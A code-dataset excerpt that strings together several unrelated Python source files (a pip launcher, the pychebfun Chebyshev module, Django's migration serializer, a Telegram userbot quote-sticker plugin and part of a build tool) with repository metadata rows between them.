if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
)
| 35.846154 | 117 | 0.690987 |
ace0a7a579a0bfdfc42638ba9d60a1114d95308d | 13,599 | py | Python | pychebfun/chebfun.py | shyams2/pychebfun | 0c1efee54829457b9e1b0d6c34259af6c002e105 | [
"BSD-3-Clause"
] | null | null | null | pychebfun/chebfun.py | shyams2/pychebfun | 0c1efee54829457b9e1b0d6c34259af6c002e105 | [
"BSD-3-Clause"
] | null | null | null | pychebfun/chebfun.py | shyams2/pychebfun | 0c1efee54829457b9e1b0d6c34259af6c002e105 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# coding: UTF-8
"""
Chebfun module
==============
.. moduleauthor :: Chris Swierczewski <cswiercz@gmail.com>
.. moduleauthor :: Olivier Verdier <olivier.verdier@gmail.com>
.. moduleauthor :: Gregory Potter <ghpotter@gmail.com>
"""
from __future__ import division
import operator
import numpy as np
from scipy import linalg
from scipy.interpolate import BarycentricInterpolator as Bary
import numpy.polynomial as poly
import scipy.fftpack as fftpack
from .polyfun import Polyfun, cast_scalar
class Chebfun(Polyfun):
"""
Eventually set this up so that a Chebfun is a collection of Chebfuns. This
will enable piecewise smooth representations al la Matlab Chebfun v2.0.
"""
# ----------------------------------------------------------------
# Standard construction class methods.
# ----------------------------------------------------------------
@classmethod
def get_default_domain(self, domain=None):
if domain is None:
return [-1., 1.]
else:
return domain
@classmethod
def identity(self, domain=[-1., 1.]):
"""
The identity function x -> x.
"""
return self.from_data([domain[1],domain[0]], domain)
@classmethod
def basis(self, n):
"""
Chebyshev basis functions T_n.
"""
if n == 0:
return self(np.array([1.]))
vals = np.ones(n+1)
vals[1::2] = -1
return self(vals)
# ----------------------------------------------------------------
# Integration and differentiation
# ----------------------------------------------------------------
def sum(self):
"""
Evaluate the integral over the given interval using
Clenshaw-Curtis quadrature.
"""
ak = self.coefficients()
ak2 = ak[::2]
n = len(ak2)
Tints = 2/(1-(2*np.arange(n))**2)
val = np.sum((Tints*ak2.T).T, axis=0)
a_, b_ = self.domain()
return 0.5*(b_-a_)*val
def integrate(self):
"""
Return the object representing the primitive of self over the domain. The
output starts at zero on the left-hand side of the domain.
"""
coeffs = self.coefficients()
a,b = self.domain()
int_coeffs = 0.5*(b-a)*poly.chebyshev.chebint(coeffs)
antiderivative = self.from_coeff(int_coeffs, domain=self.domain())
return antiderivative - antiderivative(a)
def differentiate(self, n=1):
"""
n-th derivative, default 1.
"""
ak = self.coefficients()
a_, b_ = self.domain()
for _ in range(n):
ak = self.differentiator(ak)
return self.from_coeff((2./(b_-a_))**n*ak, domain=self.domain())
# ----------------------------------------------------------------
# Roots
# ----------------------------------------------------------------
def roots(self):
"""
Utilises Boyd's O(n^2) recursive subdivision algorithm. The chebfun
is recursively subsampled until it is successfully represented to
machine precision by a sequence of piecewise interpolants of degree
100 or less. A colleague matrix eigenvalue solve is then applied to
each of these pieces and the results are concatenated.
See:
J. P. Boyd, Computing zeros on a real interval through Chebyshev
expansion and polynomial rootfinding, SIAM J. Numer. Anal., 40
(2002), pp. 1666–1682.
"""
if self.size() == 1:
return np.array([])
elif self.size() <= 100:
ak = self.coefficients()
v = np.zeros_like(ak[:-1])
v[1] = 0.5
C1 = linalg.toeplitz(v)
C2 = np.zeros_like(C1)
C1[0,1] = 1.
C2[-1,:] = ak[:-1]
C = C1 - .5/ak[-1] * C2
eigenvalues = linalg.eigvals(C)
roots = [eig.real for eig in eigenvalues
if np.allclose(eig.imag,0,atol=1e-10)
and np.abs(eig.real) <=1]
scaled_roots = self._ui_to_ab(np.array(roots))
return scaled_roots
else:
# divide at a close-to-zero split-point
split_point = self._ui_to_ab(0.0123456789)
return np.concatenate(
(self.restrict([self._domain[0],split_point]).roots(),
self.restrict([split_point,self._domain[1]]).roots())
)
def min(self):
"""
Returns the global minimum in the domain and
its location for the chebfun
"""
# Finding the roots for f'(x):
try:
r = self.differentiate().roots()
except:
# Check if it's a linear function:
if(np.product((self.differentiate())(self.domain())) < 0):
x1, x2 = self.domain()
y1, y2 = ((self.differentiate())(self.domain()))
# Finding slope:
m = (y2 - y1) / (x2 - x1)
r = np.array([x1 - y1 / m])
else:
# Initializing an empty array:
r = np.array([])
# Checking in the interior of the function:
# Initializing with an arbitrary high enough value
miny_int = 1e300
minx_int = 0
# Checking that the roots vector isn't empty:
if(r.size != 0):
minx_int = r[np.argmin(self(r))]
miny_int = self(np.array([minx_int]))[0]
# Checking on the boundaries:
minx_bound = (self.domain())[np.argmin(self(self.domain()))]
miny_bound = self(np.array([minx_bound]))[0]
# Finding minimum across boundary and interior:
imin = np.argmin([miny_int, miny_bound])
if(imin == 0):
return miny_int, minx_int
else:
return miny_bound, minx_bound
def max(self):
"""
Returns the global maximum in domain and
its location for the chebfun
"""
# Finding the roots for f'(x):
try:
r = self.differentiate().roots()
except:
# Check if it's a linear function:
if(np.product((self.differentiate())(self.domain())) < 0):
x1, x2 = self.domain()
y1, y2 = ((self.differentiate())(self.domain()))
# Finding slope:
m = (y2 - y1) / (x2 - x1)
r = np.array([x1 - y1 / m])
else:
# Initializing an empty array:
r = np.array([])
# Checking in the interior of the function:
# Initializing with an arbitrary low enough value
maxy_int = 1e300
maxx_int = 0
# Checking that the roots vector isn't empty:
if(r.size != 0):
maxx_int = r[np.argmax(self(r))]
maxy_int = self(np.array([maxx_int]))[0]
# Checking on the boundaries:
maxx_bound = (self.domain())[np.argmax(self(self.domain()))]
maxy_bound = self(np.array([maxx_bound]))[0]
# Finding maximum across boundary and interior:
imax = np.argmax([maxy_int, maxy_bound])
if(imax == 0):
return maxy_int, maxx_int
else:
return maxy_bound, maxx_bound
# ----------------------------------------------------------------
# Interpolation and evaluation (go from values to coefficients)
# ----------------------------------------------------------------
@classmethod
def interpolation_points(self, N):
"""
N Chebyshev points in [-1, 1], boundaries included
"""
if N == 1:
return np.array([0.])
return np.cos(np.arange(N)*np.pi/(N-1))
@classmethod
def sample_function(self, f, N):
"""
Sample a function on N+1 Chebyshev points.
"""
x = self.interpolation_points(N+1)
return f(x)
@classmethod
def polyfit(self, sampled):
"""
Compute Chebyshev coefficients for values located on Chebyshev points.
sampled: array; first dimension is number of Chebyshev points
"""
asampled = np.asarray(sampled)
if len(asampled) == 1:
return asampled
evened = even_data(asampled)
coeffs = dct(evened)
return coeffs
@classmethod
def polyval(self, chebcoeff):
"""
Compute the interpolation values at Chebyshev points.
chebcoeff: Chebyshev coefficients
"""
N = len(chebcoeff)
if N == 1:
return chebcoeff
data = even_data(chebcoeff)/2
data[0] *= 2
data[N-1] *= 2
fftdata = 2*(N-1)*fftpack.ifft(data, axis=0)
complex_values = fftdata[:N]
# convert to real if input was real
if np.isrealobj(chebcoeff):
values = np.real(complex_values)
else:
values = complex_values
return values
@classmethod
def interpolator(self, x, values):
"""
Returns a polynomial with vector coefficients which interpolates the values at the Chebyshev points x
"""
# hacking the barycentric interpolator by computing the weights in advance
p = Bary([0.])
N = len(values)
weights = np.ones(N)
weights[0] = .5
weights[1::2] = -1
weights[-1] *= .5
p.wi = weights
p.xi = x
p.set_yi(values)
return p
# ----------------------------------------------------------------
# Helper for differentiation.
# ----------------------------------------------------------------
@classmethod
def differentiator(self, A):
"""Differentiate a set of Chebyshev polynomial expansion
coefficients
Originally from http://www.scientificpython.net/pyblog/chebyshev-differentiation
+ (lots of) bug fixing + pythonisation
"""
m = len(A)
SA = (A.T* 2*np.arange(m)).T
DA = np.zeros_like(A)
if m == 1: # constant
return np.zeros_like(A[0:1])
if m == 2: # linear
return A[1:2,]
DA[m-3:m-1,] = SA[m-2:m,]
for j in range(m//2 - 1):
k = m-3-2*j
DA[k] = SA[k+1] + DA[k+2]
DA[k-1] = SA[k] + DA[k+1]
DA[0] = (SA[1] + DA[2])*0.5
return DA
# ----------------------------------------------------------------
# General utilities
# ----------------------------------------------------------------
def even_data(data):
"""
Construct Extended Data Vector (equivalent to creating an
even extension of the original function)
Return: array of length 2(N-1)
For instance, [0,1,2,3,4] --> [0,1,2,3,4,3,2,1]
"""
return np.concatenate([data, data[-2:0:-1]],)
def dct(data):
"""
Compute DCT using FFT
"""
N = len(data)//2
fftdata = fftpack.fft(data, axis=0)[:N+1]
fftdata /= N
fftdata[0] /= 2.
fftdata[-1] /= 2.
if np.isrealobj(data):
data = np.real(fftdata)
else:
data = fftdata
return data
# ----------------------------------------------------------------
# Add overloaded operators
# ----------------------------------------------------------------
def _add_operator(cls, op):
def method(self, other):
if not self.same_domain(other):
raise self.DomainMismatch(self.domain(), other.domain())
return self.from_function(
lambda x: op(self(x).T, other(x).T).T, domain=self.domain(), )
cast_method = cast_scalar(method)
name = '__'+op.__name__+'__'
cast_method.__name__ = name
cast_method.__doc__ = "operator {}".format(name)
setattr(cls, name, cast_method)
def rdiv(a, b):
return b/a
for _op in [operator.mul, operator.truediv, operator.pow, rdiv]:
_add_operator(Polyfun, _op)
# ----------------------------------------------------------------
# Add numpy ufunc delegates
# ----------------------------------------------------------------
def _add_delegate(ufunc, nonlinear=True):
def method(self):
return self.from_function(lambda x: ufunc(self(x)), domain=self.domain())
name = ufunc.__name__
method.__name__ = name
method.__doc__ = "delegate for numpy's ufunc {}".format(name)
setattr(Polyfun, name, method)
# Following list generated from:
# https://github.com/numpy/numpy/blob/master/numpy/core/code_generators/generate_umath.py
for func in [np.arccos, np.arccosh, np.arcsin, np.arcsinh, np.arctan, np.arctanh, np.cos, np.sin, np.tan, np.cosh, np.sinh, np.tanh, np.exp, np.exp2, np.expm1, np.log, np.log2, np.log1p, np.sqrt, np.ceil, np.trunc, np.fabs, np.floor, ]:
_add_delegate(func)
# ----------------------------------------------------------------
# General Aliases
# ----------------------------------------------------------------
## chebpts = interpolation_points
# ----------------------------------------------------------------
# Constructor inspired by the Matlab version
# ----------------------------------------------------------------
def chebfun(f=None, domain=[-1,1], N=None, chebcoeff=None,):
"""
Create a Chebyshev polynomial approximation of the function $f$ on the interval :math:`[-1, 1]`.
:param callable f: Python, Numpy, or Sage function
:param int N: (default = None) specify number of interpolating points
:param np.array chebcoeff: (default = np.array(0)) specify the coefficients
"""
# Chebyshev coefficients
if chebcoeff is not None:
return Chebfun.from_coeff(chebcoeff, domain)
# another instance
if isinstance(f, Polyfun):
return Chebfun.from_fun(f)
# callable
if hasattr(f, '__call__'):
return Chebfun.from_function(f, domain, N)
# from here on, assume that f is None, or iterable
if np.isscalar(f):
f = [f]
try:
iter(f) # interpolation values provided
except TypeError:
pass
else:
return Chebfun(f, domain)
raise TypeError('Impossible to initialise the object from an object of type {}'.format(type(f)))
| 31.479167 | 236 | 0.536804 |
ace0a7bc42f5952dc3c0ff3f85be3a28d2d45e2e | 257 | py | Python | virtualevent/virtual_event/doctype/dell_trivia_qna/dell_trivia_qna.py | eclecticmiraclecat/virtualevent | a7deb43aee1746e379714c1c242d24e703412602 | [
"MIT"
] | null | null | null | virtualevent/virtual_event/doctype/dell_trivia_qna/dell_trivia_qna.py | eclecticmiraclecat/virtualevent | a7deb43aee1746e379714c1c242d24e703412602 | [
"MIT"
] | null | null | null | virtualevent/virtual_event/doctype/dell_trivia_qna/dell_trivia_qna.py | eclecticmiraclecat/virtualevent | a7deb43aee1746e379714c1c242d24e703412602 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2020, ERP-X and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
class DellTriviaQnA(Document):
pass
| 23.363636 | 49 | 0.770428 |
ace0a860c447ca44f9aa2d3bc79f45af389fb8c6 | 12,271 | py | Python | venv/Lib/site-packages/django/db/migrations/serializer.py | Rudeus3Greyrat/admin-management | 7e81d2b1908afa3ea57a82c542c9aebb1d0ffd23 | [
"MIT"
] | 14 | 2019-05-01T05:03:20.000Z | 2022-01-08T03:18:05.000Z | venv/Lib/site-packages/django/db/migrations/serializer.py | Rudeus3Greyrat/admin-management | 7e81d2b1908afa3ea57a82c542c9aebb1d0ffd23 | [
"MIT"
] | 12 | 2020-02-12T00:25:14.000Z | 2022-03-11T23:48:53.000Z | venv/Lib/site-packages/django/db/migrations/serializer.py | Rudeus3Greyrat/admin-management | 7e81d2b1908afa3ea57a82c542c9aebb1d0ffd23 | [
"MIT"
] | 8 | 2019-05-19T11:24:28.000Z | 2022-02-16T20:19:30.000Z | import builtins
import collections.abc
import datetime
import decimal
import enum
import functools
import math
import re
import types
import uuid
from collections import OrderedDict
from django.conf import SettingsReference
from django.db import models
from django.db.migrations.operations.base import Operation
from django.db.migrations.utils import COMPILED_REGEX_TYPE, RegexObject
from django.utils.functional import LazyObject, Promise
from django.utils.timezone import utc
from django.utils.version import get_docs_version
class BaseSerializer:
def __init__(self, value):
self.value = value
def serialize(self):
raise NotImplementedError('Subclasses of BaseSerializer must implement the serialize() method.')
class BaseSequenceSerializer(BaseSerializer):
def _format(self):
raise NotImplementedError('Subclasses of BaseSequenceSerializer must implement the _format() method.')
def serialize(self):
imports = set()
strings = []
for item in self.value:
item_string, item_imports = serializer_factory(item).serialize()
imports.update(item_imports)
strings.append(item_string)
value = self._format()
return value % (", ".join(strings)), imports
class BaseSimpleSerializer(BaseSerializer):
def serialize(self):
return repr(self.value), set()
class DateTimeSerializer(BaseSerializer):
"""For datetime.*, except datetime.datetime."""
def serialize(self):
return repr(self.value), {'import datetime'}
class DatetimeDatetimeSerializer(BaseSerializer):
"""For datetime.datetime."""
def serialize(self):
if self.value.tzinfo is not None and self.value.tzinfo != utc:
self.value = self.value.astimezone(utc)
imports = ["import datetime"]
if self.value.tzinfo is not None:
imports.append("from django.utils.timezone import utc")
return repr(self.value).replace('<UTC>', 'utc'), set(imports)
class DecimalSerializer(BaseSerializer):
def serialize(self):
return repr(self.value), {"from decimal import Decimal"}
class DeconstructableSerializer(BaseSerializer):
@staticmethod
def serialize_deconstructed(path, args, kwargs):
name, imports = DeconstructableSerializer._serialize_path(path)
strings = []
for arg in args:
arg_string, arg_imports = serializer_factory(arg).serialize()
strings.append(arg_string)
imports.update(arg_imports)
for kw, arg in sorted(kwargs.items()):
arg_string, arg_imports = serializer_factory(arg).serialize()
imports.update(arg_imports)
strings.append("%s=%s" % (kw, arg_string))
return "%s(%s)" % (name, ", ".join(strings)), imports
@staticmethod
def _serialize_path(path):
module, name = path.rsplit(".", 1)
if module == "django.db.models":
imports = {"from django.db import models"}
name = "models.%s" % name
else:
imports = {"import %s" % module}
name = path
return name, imports
def serialize(self):
return self.serialize_deconstructed(*self.value.deconstruct())
class DictionarySerializer(BaseSerializer):
def serialize(self):
imports = set()
strings = []
for k, v in sorted(self.value.items()):
k_string, k_imports = serializer_factory(k).serialize()
v_string, v_imports = serializer_factory(v).serialize()
imports.update(k_imports)
imports.update(v_imports)
strings.append((k_string, v_string))
return "{%s}" % (", ".join("%s: %s" % (k, v) for k, v in strings)), imports
class EnumSerializer(BaseSerializer):
def serialize(self):
enum_class = self.value.__class__
module = enum_class.__module__
v_string, v_imports = serializer_factory(self.value.value).serialize()
imports = {'import %s' % module, *v_imports}
return "%s.%s(%s)" % (module, enum_class.__name__, v_string), imports
class FloatSerializer(BaseSimpleSerializer):
def serialize(self):
if math.isnan(self.value) or math.isinf(self.value):
return 'float("{}")'.format(self.value), set()
return super().serialize()
class FrozensetSerializer(BaseSequenceSerializer):
def _format(self):
return "frozenset([%s])"
class FunctionTypeSerializer(BaseSerializer):
def serialize(self):
if getattr(self.value, "__self__", None) and isinstance(self.value.__self__, type):
klass = self.value.__self__
module = klass.__module__
return "%s.%s.%s" % (module, klass.__name__, self.value.__name__), {"import %s" % module}
# Further error checking
if self.value.__name__ == '<lambda>':
raise ValueError("Cannot serialize function: lambda")
if self.value.__module__ is None:
raise ValueError("Cannot serialize function %r: No module" % self.value)
module_name = self.value.__module__
if '<' not in self.value.__qualname__: # Qualname can include <locals>
return '%s.%s' % (module_name, self.value.__qualname__), {'import %s' % self.value.__module__}
raise ValueError(
'Could not find function %s in %s.\n' % (self.value.__name__, module_name)
)
class FunctoolsPartialSerializer(BaseSerializer):
def serialize(self):
# Serialize functools.partial() arguments
func_string, func_imports = serializer_factory(self.value.func).serialize()
args_string, args_imports = serializer_factory(self.value.args).serialize()
keywords_string, keywords_imports = serializer_factory(self.value.keywords).serialize()
# Add any imports needed by arguments
imports = {'import functools', *func_imports, *args_imports, *keywords_imports}
return (
'functools.%s(%s, *%s, **%s)' % (
self.value.__class__.__name__,
func_string,
args_string,
keywords_string,
),
imports,
)
class IterableSerializer(BaseSerializer):
def serialize(self):
imports = set()
strings = []
for item in self.value:
item_string, item_imports = serializer_factory(item).serialize()
imports.update(item_imports)
strings.append(item_string)
# When len(strings)==0, the empty iterable should be serialized as
# "()", not "(,)" because (,) is invalid Python syntax.
value = "(%s)" if len(strings) != 1 else "(%s,)"
return value % (", ".join(strings)), imports
class ModelFieldSerializer(DeconstructableSerializer):
def serialize(self):
attr_name, path, args, kwargs = self.value.deconstruct()
return self.serialize_deconstructed(path, args, kwargs)
class ModelManagerSerializer(DeconstructableSerializer):
def serialize(self):
as_manager, manager_path, qs_path, args, kwargs = self.value.deconstruct()
if as_manager:
name, imports = self._serialize_path(qs_path)
return "%s.as_manager()" % name, imports
else:
return self.serialize_deconstructed(manager_path, args, kwargs)
class OperationSerializer(BaseSerializer):
def serialize(self):
from django.db.migrations.writer import OperationWriter
string, imports = OperationWriter(self.value, indentation=0).serialize()
# Nested operation, trailing comma is handled in upper OperationWriter._write()
return string.rstrip(','), imports
class RegexSerializer(BaseSerializer):
def serialize(self):
regex_pattern, pattern_imports = serializer_factory(self.value.pattern).serialize()
# Turn off default implicit flags (e.g. re.U) because regexes with the
# same implicit and explicit flags aren't equal.
flags = self.value.flags ^ re.compile('').flags
regex_flags, flag_imports = serializer_factory(flags).serialize()
imports = {'import re', *pattern_imports, *flag_imports}
args = [regex_pattern]
if flags:
args.append(regex_flags)
return "re.compile(%s)" % ', '.join(args), imports
class SequenceSerializer(BaseSequenceSerializer):
def _format(self):
return "[%s]"
class SetSerializer(BaseSequenceSerializer):
def _format(self):
# Serialize as a set literal except when value is empty because {}
# is an empty dict.
return '{%s}' if self.value else 'set(%s)'
class SettingsReferenceSerializer(BaseSerializer):
def serialize(self):
return "settings.%s" % self.value.setting_name, {"from django.conf import settings"}
class TupleSerializer(BaseSequenceSerializer):
def _format(self):
# When len(value)==0, the empty tuple should be serialized as "()",
# not "(,)" because (,) is invalid Python syntax.
return "(%s)" if len(self.value) != 1 else "(%s,)"
class TypeSerializer(BaseSerializer):
def serialize(self):
special_cases = [
(models.Model, "models.Model", []),
(type(None), 'type(None)', []),
]
for case, string, imports in special_cases:
if case is self.value:
return string, set(imports)
if hasattr(self.value, "__module__"):
module = self.value.__module__
if module == builtins.__name__:
return self.value.__name__, set()
else:
return "%s.%s" % (module, self.value.__name__), {"import %s" % module}
class UUIDSerializer(BaseSerializer):
def serialize(self):
return "uuid.%s" % repr(self.value), {"import uuid"}
class Serializer:
_registry = OrderedDict([
(frozenset, FrozensetSerializer),
(list, SequenceSerializer),
(set, SetSerializer),
(tuple, TupleSerializer),
(dict, DictionarySerializer),
(enum.Enum, EnumSerializer),
(datetime.datetime, DatetimeDatetimeSerializer),
((datetime.date, datetime.timedelta, datetime.time), DateTimeSerializer),
(SettingsReference, SettingsReferenceSerializer),
(float, FloatSerializer),
((bool, int, type(None), bytes, str), BaseSimpleSerializer),
(decimal.Decimal, DecimalSerializer),
((functools.partial, functools.partialmethod), FunctoolsPartialSerializer),
((types.FunctionType, types.BuiltinFunctionType, types.MethodType), FunctionTypeSerializer),
(collections.abc.Iterable, IterableSerializer),
((COMPILED_REGEX_TYPE, RegexObject), RegexSerializer),
(uuid.UUID, UUIDSerializer),
])
@classmethod
def register(cls, type_, serializer):
if not issubclass(serializer, BaseSerializer):
raise ValueError("'%s' must inherit from 'BaseSerializer'." % serializer.__name__)
cls._registry[type_] = serializer
@classmethod
def unregister(cls, type_):
cls._registry.pop(type_)
def serializer_factory(value):
if isinstance(value, Promise):
value = str(value)
elif isinstance(value, LazyObject):
# The unwrapped value is returned as the first item of the arguments
# tuple.
value = value.__reduce__()[1][0]
if isinstance(value, models.Field):
return ModelFieldSerializer(value)
if isinstance(value, models.manager.BaseManager):
return ModelManagerSerializer(value)
if isinstance(value, Operation):
return OperationSerializer(value)
if isinstance(value, type):
return TypeSerializer(value)
# Anything that knows how to deconstruct itself.
if hasattr(value, 'deconstruct'):
return DeconstructableSerializer(value)
for type_, serializer_cls in Serializer._registry.items():
if isinstance(value, type_):
return serializer_cls(value)
raise ValueError(
"Cannot serialize: %r\nThere are some values Django cannot serialize into "
"migration files.\nFor more, see https://docs.djangoproject.com/en/%s/"
"topics/migrations/#migration-serializing" % (value, get_docs_version())
)
| 36.739521 | 110 | 0.653981 |
ace0a891c60900a9fd9cdfb1e79c144efeaed721 | 9,018 | py | Python | userbot/modules/quote.py | Egazaky/OpenUbot | 11c9aef811c521e6966447600556616c3c692f28 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/modules/quote.py | Egazaky/OpenUbot | 11c9aef811c521e6966447600556616c3c692f28 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/modules/quote.py | Egazaky/OpenUbot | 11c9aef811c521e6966447600556616c3c692f28 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | # Copyright (C) 2018-2019 Friendly Telegram
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
# Port to UserBot by @MoveAngel
import requests
import base64
import json
import telethon
from logging import Logger as logger
from PIL import Image
from io import BytesIO
from userbot import bot, CMD_HELP, QUOTES_API_TOKEN
from userbot.events import register
if 1 == 1:
strings = {
"name": "Quotes",
"api_token_cfg_doc": "API Key/Token for Quotes.",
"api_url_cfg_doc": "API URL for Quotes.",
"colors_cfg_doc": "Username colors",
"default_username_color_cfg_doc": "Default color for the username.",
"no_reply": "<b>You didn't reply to a message.</b>",
"no_template": "<b>You didn't specify the template.</b>",
"delimiter": "</code>, <code>",
"server_error": "<b>Server error. Please report to developer.</b>",
"invalid_token": "<b>You've set an invalid token, get it from `http://antiddos.systems`.</b>",
"unauthorized": "<b>You're unauthorized to do this.</b>",
"not_enough_permissions": "<b>Wrong template. You can use only the default one.</b>",
"templates": "<b>Available Templates:</b> <code>{}</code>",
"cannot_send_stickers": "<b>You cannot send stickers in this chat.</b>",
"admin": "admin",
"creator": "creator",
"hidden": "hidden",
"channel": "Channel"
}
config = dict({"api_url": "http://api.antiddos.systems",
"username_colors": ["#fb6169", "#faa357", "#b48bf2", "#85de85",
"#62d4e3", "#65bdf3", "#ff5694"],
"default_username_color": "#b48bf2"})
@register(outgoing=True, pattern="^.quote(?: |$)(.*)")
async def quotecmd(message): # noqa: C901
"""Quote a message.
Usage: .pch [template]
If template is missing, possible templates are fetched."""
if not QUOTES_API_TOKEN:
return await message.edit(
"`Error: Quotes API key is missing! Add it to environment variables or config.env.`"
)
await message.delete()
args = message.raw_text.split(" ")[1:]
if args == []:
args = ["default"]
reply = await message.get_reply_message()
if not reply:
return await message.respond(strings["no_reply"])
if not args:
return await message.respond(strings["no_template"])
username_color = username = admintitle = user_id = None
profile_photo_url = reply.from_id
admintitle = ""
if isinstance(message.to_id, telethon.tl.types.PeerChannel):
try:
user = await bot(telethon.tl.functions.channels.GetParticipantRequest(message.chat_id,
reply.from_id))
if isinstance(user.participant, telethon.tl.types.ChannelParticipantCreator):
admintitle = user.participant.rank or strings["creator"]
elif isinstance(user.participant, telethon.tl.types.ChannelParticipantAdmin):
admintitle = user.participant.rank or strings["admin"]
user = user.users[0]
except telethon.errors.rpcerrorlist.UserNotParticipantError:
user = await reply.get_sender()
elif isinstance(message.to_id, telethon.tl.types.PeerChat):
chat = await bot(telethon.tl.functions.messages.GetFullChatRequest(reply.to_id))
participants = chat.full_chat.participants.participants
participant = next(filter(lambda x: x.user_id == reply.from_id, participants), None)
if isinstance(participant, telethon.tl.types.ChatParticipantCreator):
admintitle = strings["creator"]
elif isinstance(participant, telethon.tl.types.ChatParticipantAdmin):
admintitle = strings["admin"]
user = await reply.get_sender()
else:
user = await reply.get_sender()
username = telethon.utils.get_display_name(user)
user_id = reply.from_id
if reply.fwd_from:
if reply.fwd_from.saved_from_peer:
username = telethon.utils.get_display_name(reply.forward.chat)
profile_photo_url = reply.forward.chat
admintitle = strings["channel"]
elif reply.fwd_from.from_name:
username = reply.fwd_from.from_name
elif reply.forward.sender:
username = telethon.utils.get_display_name(reply.forward.sender)
elif reply.forward.chat:
username = telethon.utils.get_display_name(reply.forward.chat)
pfp = await bot.download_profile_photo(profile_photo_url, bytes)
if pfp is not None:
profile_photo_url = "data:image/png;base64, " + base64.b64encode(pfp).decode()
if user_id is not None:
username_color = config["username_colors"][user_id % 7]
else:
username_color = config["default_username_color"]
request = json.dumps({
"ProfilePhotoURL": profile_photo_url,
"usernameColor": username_color,
"username": username,
"adminTitle": admintitle,
"Text": reply.message,
"Markdown": await get_markdown(reply),
"Template": args[0],
"APIKey": QUOTES_API_TOKEN
})
resp = requests.post(config["api_url"] + "/api/v2/quote", data=request)
resp.raise_for_status()
resp = resp.json()
if resp["status"] == 500:
return await message.respond(strings["server_error"])
elif resp["status"] == 401:
if resp["message"] == "ERROR_TOKEN_INVALID":
return await message.respond(strings["invalid_token"])
else:
raise ValueError("Invalid response from server", resp)
elif resp["status"] == 403:
if resp["message"] == "ERROR_UNAUTHORIZED":
return await message.respond(strings["unauthorized"])
else:
raise ValueError("Invalid response from server", resp)
elif resp["status"] == 404:
if resp["message"] == "ERROR_TEMPLATE_NOT_FOUND":
newreq = requests.post(config["api_url"] + "/api/v1/getalltemplates", data={
"token": QUOTES_API_TOKEN
})
newreq = newreq.json()
if newreq["status"] == "NOT_ENOUGH_PERMISSIONS":
return await message.respond(strings["not_enough_permissions"])
elif newreq["status"] == "SUCCESS":
templates = strings["delimiter"].join(newreq["message"])
return await message.respond(strings["templates"].format(templates))
elif newreq["status"] == "INVALID_TOKEN":
return await message.respond(strings["invalid_token"])
else:
raise ValueError("Invalid response from server", newreq)
else:
raise ValueError("Invalid response from server", resp)
elif resp["status"] != 200:
raise ValueError("Invalid response from server", resp)
req = requests.get(config["api_url"] + "/cdn/" + resp["message"])
req.raise_for_status()
file = BytesIO(req.content)
file.seek(0)
img = Image.open(file)
with BytesIO() as sticker:
img.save(sticker, "webp")
sticker.name = "sticker.webp"
sticker.seek(0)
try:
await reply.reply(file=sticker)
except telethon.errors.rpcerrorlist.ChatSendStickersForbiddenError:
await message.respond(strings["cannot_send_stickers"])
file.close()
async def get_markdown(reply):
if not reply.entities:
return []
markdown = []
for entity in reply.entities:
md_item = {
"Type": None,
"Start": entity.offset,
"End": entity.offset + entity.length - 1
}
if isinstance(entity, telethon.tl.types.MessageEntityBold):
md_item["Type"] = "bold"
elif isinstance(entity, telethon.tl.types.MessageEntityItalic):
md_item["Type"] = "italic"
elif isinstance(entity, (telethon.tl.types.MessageEntityMention, telethon.tl.types.MessageEntityTextUrl,
telethon.tl.types.MessageEntityMentionName, telethon.tl.types.MessageEntityHashtag,
telethon.tl.types.MessageEntityCashtag, telethon.tl.types.MessageEntityBotCommand,
telethon.tl.types.MessageEntityUrl)):
md_item["Type"] = "link"
elif isinstance(entity, telethon.tl.types.MessageEntityCode):
md_item["Type"] = "code"
elif isinstance(entity, telethon.tl.types.MessageEntityStrike):
md_item["Type"] = "stroke"
elif isinstance(entity, telethon.tl.types.MessageEntityUnderline):
md_item["Type"] = "underline"
else:
logger.warning("Unknown entity: " + str(entity))
markdown.append(md_item)
return markdown
CMD_HELP.update({
"stickerchat":
">`.quote`"
"\nUsage: Same as quotly, enhance ur text to sticker."
})
| 41.944186 | 116 | 0.624418 |
ace0aa82da339d5ad03debab9b819adfcb5169a3 | 3,905 | py | Python | ligament/ligament.py | Archived-Object/ligament | ff3d78130522676a20dc64086dc8a27b197cc20f | [
"Apache-2.0"
] | 1 | 2015-07-22T15:27:40.000Z | 2015-07-22T15:27:40.000Z | ligament/ligament.py | Archived-Object/ligament | ff3d78130522676a20dc64086dc8a27b197cc20f | [
"Apache-2.0"
] | null | null | null | ligament/ligament.py | Archived-Object/ligament | ff3d78130522676a20dc64086dc8a27b197cc20f | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
import os
import sys
import imp
import json
from buildcontext import Context, DeferredDependency
from buildtarget import BuildTarget
from compositors import BuildTargetList
from buildcontextfseventhandler import BuildContextFsEventHandler
from helpers import pout, perror
from time import sleep
from watchdog.observers import Observer
from privacy import *
def load_context_from_skeleton(skeleton_path):
try:
sys.path.insert(0, '.')
ligamentfile = imp.load_source('ligamentfile', skeleton_path)
except IOError:
perror("Error importing skeleton.py file found in current directory")
exit (1)
build_context = Context()
for name, task in ligamentfile.ligament_tasks.iteritems():
if isinstance(task, BuildTarget):
pout("registered task '%s'" % name, groups=["debug"])
task.register_with_context(name, build_context)
elif isinstance(task, list):
BuildTargetList(
DeferredDependency(t) for t in task
).register_with_context(name, build_context)
to_expose = (
ligamentfile.exposed_tasks
if "exposed_tasks" in dir(ligamentfile)
else build_context.tasks)
for name in to_expose:
if name in build_context.tasks:
build_context.expose_task(name)
else:
perror("task '%s' not declared in ligament file" % name)
return build_context
def run_skeleton(skeleton_path, tasks, watch=True):
"""loads and executes tasks from a given skeleton file
skeleton_path:
path to the skeleton file
tasks:
a list of string identifiers of tasks to be executed
watch:
boolean flag of if the skeleton should be watched for changes and
automatically updated
"""
build_context = load_context_from_skeleton(skeleton_path);
